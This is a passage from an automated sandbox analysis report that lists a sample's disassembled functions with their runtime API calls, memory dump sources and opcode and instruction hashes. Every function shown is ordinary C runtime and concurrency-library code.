                    • Opcode Fuzzy Hash: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction Fuzzy Hash: DA41ACB4A00615ABEF21DFA5C99475BB7E8AF05318F04852ED815D7791EB34FA00CB81
                    Function 045062D5 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 045063A5
                    • _free.LIBCMT ref: 045063CE
                    • SetEndOfFile.KERNEL32(00000000,04501D11,00000000,044FAF99,?,?,?,?,?,?,?,04501D11,044FAF99,00000000), ref: 04506400
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,04501D11,044FAF99,00000000,?,?,?,?,00000000), ref: 0450641C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: 4db70c3c22ec6f032e069c98e453d2cfda831462f961d168723713965d6d8971
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: 0A412A3A9006019BEF20AFA9DC41BCE37A5FF85364F248515F514A71D1EB34F822A7A1
                    Function 0044606E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 0044613E
                    • _free.LIBCMT ref: 00446167
                    • SetEndOfFile.KERNEL32(00000000,00441AAA,00000000,0043AD32,?,?,?,?,?,?,?,00441AAA,0043AD32,00000000), ref: 00446199
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00441AAA,0043AD32,00000000,?,?,?,?,00000000), ref: 004461B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: 2d08f1c89283f971e2dbc99742b5c5d2ec6674a103a1ef792aed1683b5bdd9d4
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: A84107729006009AEB11AFBA8C46B8E3775AF4A364F16151BF914A7292D63CC840476A
                    Function 00402E80 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 00402F1F
                    • GetCurrentThreadId.KERNEL32 ref: 00402F3E
                    • __Mtx_unlock.LIBCPMT ref: 00402F8C
                    • __Cnd_broadcast.LIBCPMT ref: 00402FA3
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
                    • String ID:
                    • API String ID: 3471820992-0
                    • Opcode ID: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction ID: e825d9dc3a901559c5738fae14c527551fe8a17dfb067f9c5c2eb0eb023bb9bf
                    • Opcode Fuzzy Hash: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction Fuzzy Hash: 0241DFB09002069BCB20DB65CA45B9AB7F8FF14354F10453EE816E77C0EB78E900DB85
                    Function 044F1E9E Relevance: 6.1, APIs: 4, Instructions: 104threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 044F1EB7
                      • Part of subcall function 044F2186: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,044F1BFF), ref: 044F2196
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 044F1ECC
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044F1EDB
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044F1F9F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID:
                    • API String ID: 1312548968-0
                    • Opcode ID: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction ID: 99848becba7e4ba60b41b2e56d37a30dd0325441d479f20c355f0b6654fec7c2
                    • Opcode Fuzzy Hash: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction Fuzzy Hash: AF31D035A00214EBDF04EF65CC90A6E73B9BF54324F20456AEA11AB392DB70FE05CA94
                    Function 044E3073 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 044E3086
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 91c02eb5539d83a72b62fbbfd0617270cfdc3491a87c97f8cbbc782e7fbaa9cc
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: 53313775A00309EFDF11DF96C8C0ABEBBB9AF44216F0404AEDD41AB346D731A945DBA0
                    Function 00422E0C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 9beed26a825f1ece50d1044237a9d26a4491e3443ab310ceb7be1a93bb172293
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: DF318B75A00319EFCF10DF94DAC0AAE7BB9BF44304F4504AADD01AB346D7B4A944EBA5
                    Function 044FDC59 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044F6D43: _free.LIBCMT ref: 044F6D51
                      • Part of subcall function 044FEC30: WideCharToMultiByte.KERNEL32(044C89D7,00000000,0045FBB0,00000000,044C89D7,044C89D7,04500959,?,0045FBB0,?,00000000,?,045006C8,0000FDE9,00000000,?), ref: 044FECD2
                    • GetLastError.KERNEL32 ref: 044FDCC1
                    • __dosmaperr.LIBCMT ref: 044FDCC8
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 044FDD07
                    • __dosmaperr.LIBCMT ref: 044FDD0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction ID: a55beca3d9ace727bd203982c1681c1b3e43d4b0c7c013b953af2da44d13e265
                    • Opcode Fuzzy Hash: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction Fuzzy Hash: 5821DBB1A006056FFF206F62DC80867779DEF04269310452EFB2A97251F735FD018790
                    Function 0043D9F2 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
                      • Part of subcall function 0043E9C9: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444E60,?,00000000,00000000), ref: 0043EA6B
                    • GetLastError.KERNEL32 ref: 0043DA5A
                    • __dosmaperr.LIBCMT ref: 0043DA61
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043DAA0
                    • __dosmaperr.LIBCMT ref: 0043DAA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction ID: 3d9dcb479ea73530b4d2aa109c1a6950b544f6a37a2d41994a632baa8fad223f
                    • Opcode Fuzzy Hash: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction Fuzzy Hash: D521C7B1A082057F9B20BF66AD81D6BB7ADEF4C368F10911AF82597241D738EC418798
                    Function 044F1B9F Relevance: 6.1, APIs: 4, Instructions: 85threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 044F1BFA
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044F1C19
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 044F1C60
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1284976207-0
                    • Opcode ID: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction ID: 3fe5f4d87a67aea452ddab808ab9be84e177b940cc0e5a6cd0bb75188ca542e3
                    • Opcode Fuzzy Hash: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction Fuzzy Hash: A8212435700615DBDF15AB25CC94ABEB3A5BF84329F04016BE612876E2EB64BC42CBD0
                    Function 044F0E10 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON
                    Download Yara Rule
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 044F0E61
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044F0E49
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044F0EC4
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F550), ref: 044F0EC9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction ID: 1f0d90f2628ba46b07df27250a51658696b0c593784701b9f4b084ea7ca44383
                    • Opcode Fuzzy Hash: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction Fuzzy Hash: AA210775700214AFEF10AB5ACC44D7EF7A8EF84326B10045BEA15A3292DB70BD018A95
                    Function 00430BA9 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON
                    Download Yara Rule
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 00430BFA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430BE2
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430C5D
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F550), ref: 00430C62
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction ID: 57bdfcda8ae773349b13e319bab3268c626313179c611564d1a2f16d6c6a901f
                    • Opcode Fuzzy Hash: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction Fuzzy Hash: 52214635700228AFCB14EB59DC45D6EB3BCEF48325F10025BFA15A3392CA74AD018AAD
                    Function 044EA00C Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 044EA013
                    • std::bad_exception::bad_exception.LIBCMT ref: 044EA075
                    • Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 044EA0B7
                    • std::bad_exception::bad_exception.LIBCMT ref: 044EA0E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
                    • String ID:
                    • API String ID: 3836581985-0
                    • Opcode ID: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction ID: 2b21800a4f1ab2f968c484ea1c71c9551530819cbda17c653e006420cacf85f6
                    • Opcode Fuzzy Hash: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction Fuzzy Hash: CF215E719006049FEF05EFA6D884ABDB7B4AF05316F10406BE405BB291EB727D46CB55
                    Function 00429DA5 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 00429DAC
                    • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429DF8
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E0E
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                    • String ID:
                    • API String ID: 2033596534-0
                    • Opcode ID: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction ID: 4e4e7a5eb7143f9fbb3103a1f6126f4c5a38472fe452da36fe41685c322f6648
                    • Opcode Fuzzy Hash: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction Fuzzy Hash: 5A21C771A04124DFDB04EFA5E88299E77B4BF05314F61402FF401AB291DB396D45CB9D
                    Function 044FB484 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: bbae62fb23116b2adcf5c960c36d7ece776b802ef08a573278454c7bbf46ea66
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: 2921C332A01365ABDF318E64EC45B1B3759DB027A9F281122EA06A7391E638FD0186E4
                    Function 044E5219 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 044E5278
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044E529B
                    • __EH_prolog3.LIBCMT ref: 044E52B6
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 044E52DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 2642201467-0
                    • Opcode ID: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction ID: 1711f257aafa3b9dafe50486e065d6fc7a0b641aae992fb3651b7c343d29d68f
                    • Opcode Fuzzy Hash: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction Fuzzy Hash: 3321A134A00115EFDF04EF9AC890ABD73B5BF48309F10406FE5069B292DB71B901CB55
                    Function 044F16A7 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044F173B
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044F16EC
                      • Part of subcall function 044E8692: SafeRWList.LIBCONCRT ref: 044E86A3
                    • SafeRWList.LIBCONCRT ref: 044F1731
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044F1751
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: a8e724ac368a5726f60a2bf05e2be8fec40d532ba5511e5b99185acc099bd18a
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: B521837160020ADFDF04DF25C890EA5F7E9BB84219F14D2ABD5094B242E735F999CB90
                    Function 00431440 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004314D4
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                      • Part of subcall function 0042842B: SafeRWList.LIBCONCRT ref: 0042843C
                    • SafeRWList.LIBCONCRT ref: 004314CA
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 004314EA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: 32539ca2320707ce92c09178d01679dab9e49ab6512ed056795bb6ab421abb97
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: EC21F53160020EDFC704DF24C880EA5FBA9FB98318F54E2ABD4054B152DB39E99ACB94
                    Function 044F632E Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: 05d93fe1e3f76ddbc42813109b4ebb6139782de3b816a21b518e5d0122c5ad61
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: B211B635A01725ABDF324F689C44E1B3768AF01760F160267EA15A7391EF70FD0396E4
                    Function 044DF664 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 044DF686
                      • Part of subcall function 044DF842: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 044E57FD
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 044DF6A7
                      • Part of subcall function 044E0529: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044E0545
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 044DF6C3
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 044DF6CA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: d11f801bf4e4961f8debcf564f11801091accc190765bdcc192d232d688741d7
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: 1F01F9B1500305BFEF307F668C8089BBBACDF25358B10493FB856D2652D7B0B50A87A5
                    Function 0041F3FD Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F41F
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F440
                      • Part of subcall function 004202C2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004202DE
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F45C
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F463
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: c143f49b80a8edc336b5adb3e2ea19dd9ba997e834122e1f90eeb7ad8e6c388c
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: 3B018E71900305BBD7207F6ACC819DBBBA8DF20358B10893FF85492142D778998A87AD
                    Function 044F3736 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044F3750
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 044F3764
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044F377C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F3794
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: f5be3a5dc4f62ea34fc1e3d445c243a1e08cb5dcfc3e7a73d4707ef1c6cf7dc4
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: 1001D672B00514A7DF25AE968C40AEFB7D9AF45258F00405BEE15EB381D971FD0196A1
                    Function 004334CF Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004334E9
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004334FD
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433515
